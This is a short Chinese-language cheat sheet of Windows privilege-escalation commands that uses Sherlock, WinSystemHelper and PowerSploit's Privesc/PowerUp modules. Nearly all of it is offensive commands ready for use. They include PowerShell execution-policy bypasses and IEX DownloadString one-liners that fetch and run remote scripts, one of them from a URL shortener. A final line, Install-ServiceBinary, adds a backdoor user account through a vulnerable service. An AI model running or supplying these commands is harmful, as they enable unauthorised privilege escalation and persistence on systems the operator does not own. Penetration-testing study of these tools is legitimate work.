1 windows分析工具利用
1.1 WinsystemHelper-master
上传bat+txt文件,运行bat查看结果
注:xp,2000 ,2003常用
powershell环境下
1.2 Sherlock
1.2.1 启动powershell
powershell.exe -exec bypass
1.2.2本地加载脚本
Import-Module Sherlock.ps1
远程加载脚本
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
发现漏洞
Find-AllVulns
非交互环境下
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
1.3 Privesc(PowerSploit-master框架下的一种)
本地加载脚本
Import-Module .\Privesc.psm1
获取函数
Get-Command -Module Privesc
检测全部信息
Invoke-AllChecks
命令行下执行(非交互环境)
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
远程调用执行
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://dwz.cn/2vkbfP'); Invoke-AllChecks"
添加用户
Install-ServiceBinary -ServerName 'Apache_pn' -UserName shadowflow -Password flow